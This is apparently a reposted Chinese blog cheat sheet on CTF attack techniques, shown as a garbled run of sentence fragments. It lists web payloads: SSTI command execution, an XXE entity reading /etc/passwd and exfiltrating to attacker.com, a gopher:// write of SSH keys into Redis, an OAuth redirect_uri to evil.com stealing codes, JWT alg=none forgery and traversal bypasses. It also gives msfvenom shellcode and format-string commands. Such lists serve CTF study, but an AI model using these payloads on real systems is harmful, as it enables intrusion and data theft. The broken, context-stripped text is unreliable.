本文共 3039 字,大约阅读时间需要 10 分钟。
CTF(Capture The Flag)竞赛是一种经典的网络安全竞赛,强调攻防逻辑和技术能力。以下是CTF核心逻辑与学习路线的详细干事。
/!50000注释/混淆真实语句。CONCAT(CHAR(115),CHAR(101))代替敏感字符。{ {''.class.mro[1].subclasses()}}获取危险类。{ {_self.env.registerUndefinedFilterCallback("exec")}}执行命令。php://input读取POST数据,实现Webshell。logrotate日志文件包含获取敏感信息。alg字段为none,删除签名。hashcat -m 16500破解弱密钥。<!ENTITY xxe SYSTEM "file:///etc/passwd">获取系统文件。http://attacker.com/?data=%xxe;触发攻击。<img src="[URL]">触发请求。gopher://协议攻击Redis服务,写入SSH密钥。__destruct()或__wakeup()进行链式劫持。flask-unsign伪造Session签名。Origin: target.com,欺骗服务器返回数据。Transfer-Encoding: chunked与Content-Length绕过网关。....//或%2e%2e%2f绕过检查。redirect_uri=http://evil.com窃取授权码。 窃取登录态。"flag"或"correct"定位关键逻辑。cyclic 200生成字符串,结合dmesg查看崩溃地址。%n向某一地址写入数据。/proc/self/status中的TracerPid字段。strcmp函数绕过密码校验。msfvenom -b '\x00'生成无空字符-shellcode。Angr自动化求解复杂问题。zbarimg扫描并提取模糊或残缺二维码。=)、Base32(全大写字母)、Base58(无0/O/I/l)。e=3时,对密文立方。hash_extender发射伪造合法签名。Stegsolve.jar提取隐写数据。zipdetails修改加密标记位。qpdf --stream-data=uncompress获取隐藏文本或对象流。dir /R查看ADS。89 50 4E 47 0D 0A 1A 0A和CRC校验。http.request.method == "POST"。volatility -f dump.raw pslist。grep -oE匹配特定格式。requests和延时判断逐字符爆破。/.git/HEAD确认存在,并使用git-dumper恢复源码。vbaProject.bin。FlateDecode对象流。##sentence_end
扫描链接获取更多实用资料
转载地址:http://wzryk.baihongyu.com/